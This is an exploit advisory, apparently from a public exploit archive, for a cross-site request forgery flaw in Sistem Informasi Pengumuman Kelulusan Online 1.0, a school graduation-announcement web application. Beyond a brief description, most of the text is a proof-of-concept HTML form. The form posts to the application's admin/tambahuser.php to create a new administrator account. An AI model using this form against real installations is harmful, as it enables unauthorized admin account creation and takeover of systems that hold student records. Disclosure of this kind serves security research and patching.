Sistem Informasi Pengumuman Kelulusan Online 1.0 CSRF

Sistem Informasi Pengumuman Kelulusan Online version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | fbf139e97c72e479d33c0014eaa67e75

# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 2020-06-10
# Exploit Author: Extinction
# Vendor Homepage:
# Software Link:
# Version: latest
# Tested on: Linux,windows,macOS

# Description SpearSecurity :
# CSRF vulnerability was discovered in Sistem kelulusan.
# With this vulnerability, authorized users can be added to the system.


<form action="[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama"
placeholder="Username" size="35">
<input type="text" class="form-control" name="username"
placeholder="Spear" size="35">
<input type="text" class="form-control" name="pass"
placeholder="Security" size="35">
<input type="submit" name="submit" id="submit" value="Simpan Data"
class="btn btn-primary" onclick="tb_remove()">
<h2> Author Extinction </h2>


Related Posts